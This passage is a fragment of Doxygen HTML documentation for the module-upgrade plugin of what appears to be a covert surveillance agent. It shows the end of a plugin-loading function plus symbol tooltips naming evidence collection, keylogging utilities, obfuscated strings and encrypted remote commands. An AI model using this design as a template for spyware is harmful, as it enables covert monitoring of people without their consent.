<div class="line"><a name="l00166"></a><span class="lineno">  166</span>&#160;                res = <a class="code" href="classAgentPluginPrivate_1_1CPluginBase.html#a3460f627cc56a1519648a9bdda87d805">_core</a>-&gt;<a class="code" href="classAgentCore_1_1ICore.html#a99ee4fb74b941571a8abd2ec0490f57a">plgMgr</a>()-&gt;<a class="code" href="classAgentCore_1_1IPluginManager.html#a29ed4c54f2684c2f171480f6248b4f06">loadPlugin</a>(plgPath);</div>
<div class="line"><a name="l00167"></a><span class="lineno">  167</span>&#160;            }</div>
<div class="line"><a name="l00168"></a><span class="lineno">  168</span>&#160;        }</div>
<div class="line"><a name="l00169"></a><span class="lineno">  169</span>&#160;    }</div>
<div class="line"><a name="l00170"></a><span class="lineno">  170</span>&#160;    <span class="keywordflow">while</span> (0);</div>
<div class="line"><a name="l00171"></a><span class="lineno">  171</span>&#160;    CMemory::free(downloadedBuffer);</div>
<div class="line"><a name="l00172"></a><span class="lineno">  172</span>&#160;    CMemory::free(upgradeBuffer);</div>
<div class="line"><a name="l00173"></a><span class="lineno">  173</span>&#160;    CMemory::free(plgPath);</div>
<div class="line"><a name="l00174"></a><span class="lineno">  174</span>&#160;    <span class="keywordflow">return</span> res;</div>
<div class="line"><a name="l00175"></a><span class="lineno">  175</span>&#160;}</div>
</div><!-- fragment --></div><!-- contents -->
<div class="ttc" id="aCModUpdate_8h_html"><div class="ttname"><a href="CModUpdate_8h.html">CModUpdate.h</a></div></div>
<div class="ttc" id="aclassAgentPluginPrivate_1_1CModUpdate_html_adfb83ca66dd70f0647d1824819cc7282"><div class="ttname"><a href="classAgentPluginPrivate_1_1CModUpdate.html#adfb83ca66dd70f0647d1824819cc7282">AgentPluginPrivate::CModUpdate::~CModUpdate</a></div><div class="ttdeci">~CModUpdate() final</div><div class="ttdef"><b>Definition:</b> <a href="CModUpdate_8cpp_source.html#l00035">CModUpdate.cpp:35</a></div></div>
<div class="ttc" id="aclassAgentPluginPrivate_1_1CPluginBase_html_a64ee7a236b4e8bc465581361e18ef26b"><div class="ttname"><a href="classAgentPluginPrivate_1_1CPluginBase.html#a64ee7a236b4e8bc465581361e18ef26b">AgentPluginPrivate::CPluginBase::start</a></div><div class="ttdeci">int start(void *params=nullptr) override</div><div class="ttdef"><b>Definition:</b> <a href="CPluginBase_8cpp_source.html#l00018">CPluginBase.cpp:18</a></div></div>
<div class="ttc" id="aclassAgentCore_1_1IPluginManager_html_a29ed4c54f2684c2f171480f6248b4f06"><div class="ttname"><a href="classAgentCore_1_1IPluginManager.html#a29ed4c54f2684c2f171480f6248b4f06">AgentCore::IPluginManager::loadPlugin</a></div><div class="ttdeci">virtual int loadPlugin(const char *path)=0</div></div>
<div class="ttc" id="anamespaceAgentPlugin_html"><div class="ttname"><a href="namespaceAgentPlugin.html">AgentPlugin</a></div><div class="ttdef"><b>Definition:</b> <a href="CEvidenceManager_8h_source.html#l00011">CEvidenceManager.h:11</a></div></div>
<div class="ttc" id="aCModUpdate_8cpp_html_a0acf7475326cdcd31d690b72033de33a"><div class="ttname"><a href="CModUpdate_8cpp.html#a0acf7475326cdcd31d690b72033de33a">PLUGIN_NAME</a></div><div class="ttdeci">#define PLUGIN_NAME</div><div class="ttdef"><b>Definition:</b> <a href="CModUpdate_8cpp_source.html#l00017">CModUpdate.cpp:16</a></div></div>
<div class="ttc" id="aCPluginBase_8cpp_html_ac294a95d63deba8831a754100349423d"><div class="ttname"><a href="CPluginBase_8cpp.html#ac294a95d63deba8831a754100349423d">_instance</a></div><div class="ttdeci">IPlugin * _instance</div><div class="ttdef"><b>Definition:</b> <a href="CPluginBase_8cpp_source.html#l00016">CPluginBase.cpp:16</a></div></div>
<div class="ttc" id="aclassAgentPluginPrivate_1_1CModUpdate_html_a0aa8ec9014a3de40cd4fae350206e312"><div class="ttname"><a href="classAgentPluginPrivate_1_1CModUpdate.html#a0aa8ec9014a3de40cd4fae350206e312">AgentPluginPrivate::CModUpdate::start</a></div><div class="ttdeci">int start(void *params=nullptr) override</div><div class="ttdef"><b>Definition:</b> <a href="CModUpdate_8cpp_source.html#l00040">CModUpdate.cpp:40</a></div></div>
<div class="ttc" id="aclassAgentPluginPrivate_1_1CPluginBase_html_a5d56f0844f3dc55b5e93206418a9397b"><div class="ttname"><a href="classAgentPluginPrivate_1_1CPluginBase.html#a5d56f0844f3dc55b5e93206418a9397b">AgentPluginPrivate::CPluginBase::internalName</a></div><div class="ttdeci">const char * internalName() override</div><div class="ttdef"><b>Definition:</b> <a href="CPluginBase_8cpp_source.html#l00055">CPluginBase.cpp:55</a></div></div>
<div class="ttc" id="aclassAgentPlugin_1_1IPlugin_html"><div class="ttname"><a href="classAgentPlugin_1_1IPlugin.html">AgentPlugin::IPlugin</a></div><div class="ttdoc">exposes plugins functionality to the core's plugin manager AgentCorePrivate::CPluginManager</div><div class="ttdef"><b>Definition:</b> <a href="IPlugin_8h_source.html#l00063">IPlugin.h:63</a></div></div>
<div class="ttc" id="aclassAgentCore_1_1ICore_html_adb8fdbcd57b38c6b929b6fd1017d5766"><div class="ttname"><a href="classAgentCore_1_1ICore.html#adb8fdbcd57b38c6b929b6fd1017d5766">AgentCore::ICore::bp</a></div><div class="ttdeci">virtual IBinaryPatch * bp()=0</div></div>
<div class="ttc" id="aclassAgentPluginPrivate_1_1CModUpdate_html_ae2c60c0f2b7bd0e5d951b8fb0ec09d1a"><div class="ttname"><a href="classAgentPluginPrivate_1_1CModUpdate.html#ae2c60c0f2b7bd0e5d951b8fb0ec09d1a">AgentPluginPrivate::CModUpdate::CModUpdate</a></div><div class="ttdeci">CModUpdate()</div><div class="ttdef"><b>Definition:</b> <a href="CModUpdate_8cpp_source.html#l00028">CModUpdate.cpp:28</a></div></div>
<div class="ttc" id="aclassAgentCore_1_1IPluginManager_html_a78665e53fb97298c2663a21d395d1eb6"><div class="ttname"><a href="classAgentCore_1_1IPluginManager.html#a78665e53fb97298c2663a21d395d1eb6">AgentCore::IPluginManager::pluginsPath</a></div><div class="ttdeci">virtual const char * pluginsPath()=0</div></div>
<div class="ttc" id="agroup__PLUGINS__INTERNAL_html_ga1041ad5edc0a7e6b0dc4ff7cffaf332e"><div class="ttname"><a href="group__PLUGINS__INTERNAL.html#ga1041ad5edc0a7e6b0dc4ff7cffaf332e">PLUGIN_TYPE_GENERIC</a></div><div class="ttdeci">#define PLUGIN_TYPE_GENERIC</div><div class="ttdoc">the default plugin type which collects evidences, or an extension plugin</div><div class="ttdef"><b>Definition:</b> <a href="IPlugin_8h_source.html#l00038">IPlugin.h:37</a></div></div>
<div class="ttc" id="astructAgentPlugin_1_1__PluginInitStruct_html"><div class="ttname"><a href="structAgentPlugin_1_1__PluginInitStruct.html">AgentPlugin::_PluginInitStruct</a></div><div class="ttdoc">this gets passed through IPlugin::init() when a plugin is initialized</div><div class="ttdef"><b>Definition:</b> <a href="IPlugin_8h_source.html#l00029">IPlugin.h:29</a></div></div>
<div class="ttc" id="aclassBdUtils_1_1CJson_html"><div class="ttname"><a href="classBdUtils_1_1CJson.html">BdUtils::CJson</a></div><div class="ttdoc">json encoding/decoding utilities, based on ArduinoJson</div><div class="ttdef"><b>Definition:</b> <a href="CJson_8h_source.html#l00017">CJson.h:17</a></div></div>
<div class="ttc" id="aclassAgentCore_1_1ICore_html_a3fac8e32c46d48ebd4c2f698b8848418"><div class="ttname"><a href="classAgentCore_1_1ICore.html#a3fac8e32c46d48ebd4c2f698b8848418">AgentCore::ICore::setClosing</a></div><div class="ttdeci">virtual void setClosing()=0</div></div>
<div class="ttc" id="aclassAgentCore_1_1IBinaryPatch_html_a7caf7743d0da8989be2326ec727e6364"><div class="ttname"><a href="classAgentCore_1_1IBinaryPatch.html#a7caf7743d0da8989be2326ec727e6364">AgentCore::IBinaryPatch::fallbackKey</a></div><div class="ttdeci">virtual const uint8_t * fallbackKey(uint32_t *size=0)=0</div></div>
<div class="ttc" id="aclassAgentPluginPrivate_1_1CModUpdate_html_a15ab0ea07a84c66c2aca14e6a12bf823"><div class="ttname"><a href="classAgentPluginPrivate_1_1CModUpdate.html#a15ab0ea07a84c66c2aca14e6a12bf823">AgentPluginPrivate::CModUpdate::stop</a></div><div class="ttdeci">int stop(void *params=nullptr) override</div><div class="ttdef"><b>Definition:</b> <a href="CModUpdate_8cpp_source.html#l00065">CModUpdate.cpp:65</a></div></div>
<div class="ttc" id="aclassAgentCore_1_1ICore_html"><div class="ttname"><a href="classAgentCore_1_1ICore.html">AgentCore::ICore</a></div><div class="ttdoc">exposes the application (agent) context AgentCorePrivate::CAppContext to the plugins</div><div class="ttdef"><b>Definition:</b> <a href="ICore_8h_source.html#l00032">ICore.h:32</a></div></div>
<div class="ttc" id="abdutils_8h_html"><div class="ttname"><a href="bdutils_8h.html">bdutils.h</a></div></div>
<div class="ttc" id="aCLog_8h_html_a111656e99a3f411e44b064c32a0d55af"><div class="ttname"><a href="CLog_8h.html#a111656e99a3f411e44b064c32a0d55af">DBGLOGW</a></div><div class="ttdeci">#define DBGLOGW(...)</div><div class="ttdoc">prints WARNING debug log</div><div class="ttdef"><b>Definition:</b> <a href="CLog_8h_source.html#l00059">CLog.h:58</a></div></div>
<div class="ttc" id="aclassAgentPluginPrivate_1_1CModUpdate_html_adddc9d80588d19c952b6cfffd4f2b62c"><div class="ttname"><a href="classAgentPluginPrivate_1_1CModUpdate.html#adddc9d80588d19c952b6cfffd4f2b62c">AgentPluginPrivate::CModUpdate::upgrade</a></div><div class="ttdeci">int upgrade(const char *url, const char *internalName=nullptr)</div><div class="ttdef"><b>Definition:</b> <a href="CModUpdate_8cpp_source.html#l00083">CModUpdate.cpp:83</a></div></div>
<div class="ttc" id="aCModUpdate_8cpp_html_a059b25eae0c9691ffc03478bef362549"><div class="ttname"><a href="CModUpdate_8cpp.html#a059b25eae0c9691ffc03478bef362549">instance</a></div><div class="ttdeci">IPlugin * instance()</div><div class="ttdef"><b>Definition:</b> <a href="CModUpdate_8cpp_source.html#l00021">CModUpdate.cpp:21</a></div></div>
<div class="ttc" id="aclassAgentCore_1_1ICore_html_a1cdf086cc83f68a0fa6047f8dc711462"><div class="ttname"><a href="classAgentCore_1_1ICore.html#a1cdf086cc83f68a0fa6047f8dc711462">AgentCore::ICore::corePath</a></div><div class="ttdeci">virtual const char * corePath()=0</div></div>
<div class="ttc" id="aclassAgentPlugin_1_1IPlugin_html_a1f783bc8ded1aded455f3b4e73329595"><div class="ttname"><a href="classAgentPlugin_1_1IPlugin.html#a1f783bc8ded1aded455f3b4e73329595">AgentPlugin::IPlugin::path</a></div><div class="ttdeci">virtual const char * path()=0</div></div>
<div class="ttc" id="aclassAgentCore_1_1ICore_html_a323c207478526f7f6a8393f698d81d55"><div class="ttname"><a href="classAgentCore_1_1ICore.html#a323c207478526f7f6a8393f698d81d55">AgentCore::ICore::setUpgrading</a></div><div class="ttdeci">virtual void setUpgrading()=0</div></div>
<div class="ttc" id="aclassAgentCore_1_1IPluginManager_html_a79dc5183eb3b3bd2acf7c210e4366139"><div class="ttname"><a href="classAgentCore_1_1IPluginManager.html#a79dc5183eb3b3bd2acf7c210e4366139">AgentCore::IPluginManager::writeAsset</a></div><div class="ttdeci">virtual int writeAsset(const char *path, const uint8_t *buf, size_t size)=0</div></div>
<div class="ttc" id="anamespaceBdUtils_html"><div class="ttname"><a href="namespaceBdUtils.html">BdUtils</a></div><div class="ttdef"><b>Definition:</b> <a href="CPluginBase_8h_source.html#l00016">CPluginBase.h:16</a></div></div>
<div class="ttc" id="aCLog_8h_html_a6116789398e26a1c2bc635117a2e4960"><div class="ttname"><a href="CLog_8h.html#a6116789398e26a1c2bc635117a2e4960">DBGLOGE</a></div><div class="ttdeci">#define DBGLOGE(...)</div><div class="ttdoc">prints ERROR debug log</div><div class="ttdef"><b>Definition:</b> <a href="CLog_8h_source.html#l00063">CLog.h:62</a></div></div>
<div class="ttc" id="aCLog_8h_html_a2b5d27a6100113b1a09dce32f08b6f07"><div class="ttname"><a href="CLog_8h.html#a2b5d27a6100113b1a09dce32f08b6f07">DBGLOGI</a></div><div class="ttdeci">#define DBGLOGI(...)</div><div class="ttdoc">set to enable debug messages on release builds</div><div class="ttdef"><b>Definition:</b> <a href="CLog_8h_source.html#l00055">CLog.h:54</a></div></div>
<div class="ttc" id="anamespaceAgentCore_html"><div class="ttname"><a href="namespaceAgentCore.html">AgentCore</a></div><div class="ttdef"><b>Definition:</b> <a href="CKeylogUtils_8h_source.html#l00012">CKeylogUtils.h:12</a></div></div>
<div class="ttc" id="aICore_8h_html"><div class="ttname"><a href="ICore_8h.html">ICore.h</a></div></div>
<div class="ttc" id="aobfuscate_8h_html_aeb960253580086e334d4f65300c10256"><div class="ttname"><a href="obfuscate_8h.html#aeb960253580086e334d4f65300c10256">vxENCRYPT</a></div><div class="ttdeci">#define vxENCRYPT(Str)</div><div class="ttdoc">compile-time encrypt string (release build only)</div><div class="ttdef"><b>Definition:</b> <a href="obfuscate_8h_source.html#l00097">obfuscate.h:96</a></div></div>
<div class="ttc" id="aclassAgentCore_1_1IPluginManager_html_a9ce40fc842d9dc049eb284f0a1f88f4c"><div class="ttname"><a href="classAgentCore_1_1IPluginManager.html#a9ce40fc842d9dc049eb284f0a1f88f4c">AgentCore::IPluginManager::uninstallPlugin</a></div><div class="ttdeci">virtual int uninstallPlugin(const char *internalName, bool unload=true)=0</div></div>
<div class="ttc" id="aCAgentRemoteCmdUtils_8h_html"><div class="ttname"><a href="CAgentRemoteCmdUtils_8h.html">CAgentRemoteCmdUtils.h</a></div></div>
<div class="ttc" id="aclassBdUtils_1_1CJson_html_ad055b1a97d7a1afe376dd68389929582"><div class="ttname"><a href="classBdUtils_1_1CJson.html#ad055b1a97d7a1afe376dd68389929582">BdUtils::CJson::getStringValue</a></div><div class="ttdeci">static char * getStringValue(JsonObject &amp;n, const char *name, const char **out=nullptr)</div><div class="ttdef"><b>Definition:</b> <a href="CJson_8cpp_source.html#l00106">CJson.cpp:106</a></div></div>
<div class="ttc" id="aCLog_8h_html_a989e37701588731748694b31a0b424db"><div class="ttname"><a href="CLog_8h.html#a989e37701588731748694b31a0b424db">DBGLOGV</a></div><div class="ttdeci">#define DBGLOGV(...)</div><div class="ttdoc">prints VERBOSE debug log</div><div class="ttdef"><b>Definition:</b> <a href="CLog_8h_source.html#l00067">CLog.h:66</a></div></div>
<div class="ttc" id="aclassAgentPluginPrivate_1_1CPluginBase_html"><div class="ttname"><a href="classAgentPluginPrivate_1_1CPluginBase.html">AgentPluginPrivate::CPluginBase</a></div><div class="ttdoc">base class for all plugins, implements AgentPlugin::IPlugin</div><div class="ttdef"><b>Definition:</b> <a href="CPluginBase_8h_source.html#l00029">CPluginBase.h:29</a></div></div>
<div class="ttc" id="aclassAgentPluginPrivate_1_1CPluginBase_html_ae911813ab8976f3c8700e0f9e1425c63"><div class="ttname"><a href="classAgentPluginPrivate_1_1CPluginBase.html#ae911813ab8976f3c8700e0f9e1425c63">AgentPluginPrivate::CPluginBase::init</a></div><div class="ttdeci">int init(AgentCore::ICore *core=nullptr, AgentPlugin::PluginInitStruct *params=nullptr) override</div><div class="ttdef"><b>Definition:</b> <a href="CPluginBase_8cpp_source.html#l00044">CPluginBase.cpp:44</a></div></div>
<div class="ttc" id="aclassAgentCore_1_1ICore_html_a89715d5346c9c19ab665394aba9e291c"><div class="ttname"><a href="classAgentCore_1_1ICore.html#a89715d5346c9c19ab665394aba9e291c">AgentCore::ICore::deviceKey</a></div><div class="ttdeci">virtual uint8_t * deviceKey(size_t *size=nullptr)=0</div></div>
<div class="ttc" id="aclassAgentPluginPrivate_1_1CModUpdate_html_ae95827402322ae6e749eb14f17949210"><div class="ttname"><a href="classAgentPluginPrivate_1_1CModUpdate.html#ae95827402322ae6e749eb14f17949210">AgentPluginPrivate::CModUpdate::init</a></div><div class="ttdeci">int init(AgentCore::ICore *core, AgentPlugin::PluginInitStruct *params) override</div><div class="ttdef"><b>Definition:</b> <a href="CModUpdate_8cpp_source.html#l00070">CModUpdate.cpp:70</a></div></div>
<div class="ttc" id="aclassAgentPluginPrivate_1_1CModUpdate_html"><div class="ttname"><a href="classAgentPluginPrivate_1_1CModUpdate.html">AgentPluginPrivate::CModUpdate</a></div><div class="ttdoc">plugin which implements single module or full agent upgrade.</div><div class="ttdef"><b>Definition:</b> <a href="CModUpdate_8h_source.html#l00057">CModUpdate.h:57</a></div></div>
<div class="ttc" id="aclassAgentPluginPrivate_1_1CPluginBase_html_a3460f627cc56a1519648a9bdda87d805"><div class="ttname"><a href="classAgentPluginPrivate_1_1CPluginBase.html#a3460f627cc56a1519648a9bdda87d805">AgentPluginPrivate::CPluginBase::_core</a></div><div class="ttdeci">AgentCore::ICore * _core</div><div class="ttdef"><b>Definition:</b> <a href="CPluginBase_8h_source.html#l00096">CPluginBase.h:96</a></div></div>
<div class="ttc" id="aclassAgentPluginPrivate_1_1CPluginBase_html_a6ae9bc38da76381cf42c462e5e2db085"><div class="ttname"><a href="classAgentPluginPrivate_1_1CPluginBase.html#a6ae9bc38da76381cf42c462e5e2db085">AgentPluginPrivate::CPluginBase::stop</a></div><div class="ttdeci">int stop(void *params=nullptr) override</div><div class="ttdef"><b>Definition:</b> <a href="CPluginBase_8cpp_source.html#l00029">CPluginBase.cpp:29</a></div></div>
<div class="ttc" id="aclassAgentCore_1_1IPluginManager_html_a8d176472329b94c6b2a4a87994e3a007"><div class="ttname"><a href="classAgentCore_1_1IPluginManager.html#a8d176472329b94c6b2a4a87994e3a007">AgentCore::IPluginManager::findLoadedPlugin</a></div><div class="ttdeci">virtual AgentPlugin::IPlugin * findLoadedPlugin(const char *internalName, bool *started=nullptr)=0</div></div>
<div class="ttc" id="anamespaceAgentPluginPrivate_html"><div class="ttname"><a href="namespaceAgentPluginPrivate.html">AgentPluginPrivate</a></div><div class="ttdef"><b>Definition:</b> <a href="CPluginBase_8h_source.html#l00023">CPluginBase.h:23</a></div></div>
<div class="ttc" id="aclassAgentPluginPrivate_1_1CPluginBase_html_afd5f2c5be8d9fb41936a9e5f919fb2eb"><div class="ttname"><a href="classAgentPluginPrivate_1_1CPluginBase.html#afd5f2c5be8d9fb41936a9e5f919fb2eb">AgentPluginPrivate::CPluginBase::rng</a></div><div class="ttdeci">BdUtils::CRNG * rng()</div><div class="ttdef"><b>Definition:</b> <a href="CPluginBase_8cpp_source.html#l00137">CPluginBase.cpp:137</a></div></div>
<div class="ttc" id="aclassAgentCore_1_1ICore_html_a99ee4fb74b941571a8abd2ec0490f57a"><div class="ttname"><a href="classAgentCore_1_1ICore.html#a99ee4fb74b941571a8abd2ec0490f57a">AgentCore::ICore::plgMgr</a></div><div class="ttdeci">virtual IPluginManager * plgMgr()=0</div></div>
<div class="ttc" id="aclassAgentPluginPrivate_1_1CAgentRemoteCmdUtils_html_a87e3401608c06dff3855b987ada2fa3b"><div class="ttname"><a href="classAgentPluginPrivate_1_1CAgentRemoteCmdUtils.html#a87e3401608c06dff3855b987ada2fa3b">AgentPluginPrivate::CAgentRemoteCmdUtils::decryptRemoteCmd</a></div><div class="ttdeci">static int decryptRemoteCmd(uint8_t *deviceKey, uint8_t *fallbackKey, uint8_t *msgBuffer, uint32_t size, uint8_t **out, uint32_t *outSize)</div><div class="ttdef"><b>Definition:</b> <a href="CAgentRemoteCmdUtils_8cpp_source.html#l00063">CAgentRemoteCmdUtils.cpp:63</a></div></div>
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated by &#160;<a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.18
</small></address>
</body>
</html>
